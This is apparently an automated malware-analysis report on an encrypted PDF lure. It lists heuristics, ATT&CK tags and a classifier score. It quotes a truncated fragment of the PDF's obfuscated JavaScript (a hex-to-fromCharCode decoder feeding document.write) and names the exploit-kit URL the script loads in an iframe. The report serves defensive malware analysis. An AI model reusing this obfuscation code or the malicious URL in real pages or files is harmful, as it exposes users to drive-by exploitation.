MALICIOUS
60
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.002 Spearphishing Attachment
The PDF is encrypted, but static analysis revealed an embedded script payload. The script, when decoded, constructs an iframe pointing to 'http://reddii.ru/traffic/sployt1/sp1.php?'+Math.round(Math.random()*11845)+'. This indicates the PDF is likely a lure to redirect the user to a malicious site, potentially for further exploitation or credential harvesting.
Machine Learning
- Nyx PDF Classifier malicious score 0.9994
Heuristics 3
-
Embedded script payload in PDF stream medium PDF_EMBEDDED_SCRIPT_PAYLOADPDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
-
String.fromCharCode low PDF_FROMCHARCODEString.fromCharCode found — used to construct payload strings dynamically. Common in benign JavaScript libraries for codepoint manipulation, so this alone is informational; weaponised use is also caught by the dedicated fromCharCode-stage and exploit-shape rules.Matched line in script
endobj 19 0 obj<</R 2/Length 40/Filter/Standard/O(²½ î\)ùIª$ Éo \n ÙãÉÉ Y Ù} Å} -§jÓ)/P -60/U(æOr[ ` 7Ö³"9ðZËÒØM<script>function vbYbdxtdtxd(vtydbdadxax){ return(parseInt(vtydbdadxax,16));}function vxVtydaabba(vayaVVabdYY){ var vVatbayydtY='';for(vxtYxdydYYV=0; vxtYxdydYYV<vayaVVabdYY.length; vxtYxdydYYV+=2){vVatbayydtY+=(String.fromCharCode(vbYbdxtdtxd(vayaVVabdYY.substr(vxtYxdydYYV,2))));}return vVatbayydtY;} document.write(vxVtydaabba('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F … -
Encrypted PDF (string and stream contents are opaque to static scan) info PDF_ENCRYPTEDPDF declares /Encrypt — string objects and stream contents are encrypted with the standard security handler (RC4 or AES). On its own this is informational; legitimate encrypted documents include signed contracts, billing statements, and rights-managed material. Static heuristics cannot inspect encrypted payload bytes.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
embedded_pdf_script_00000325.bin |
pdf-embedded-script | PDF decompressed stream script payload at offset 0x325 | 58 bytes |
SHA-256: a7c962ec478d5348e3cd62abde37058c6ff2a011fcf4e46b79217e98b417a57a |
|||
Preview scriptFirst 1,000 lines of the extracted script
�Or[�` 7ֳ"9�Z���M<script>function vbYbdxtdtxd(vtydbdadxax |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.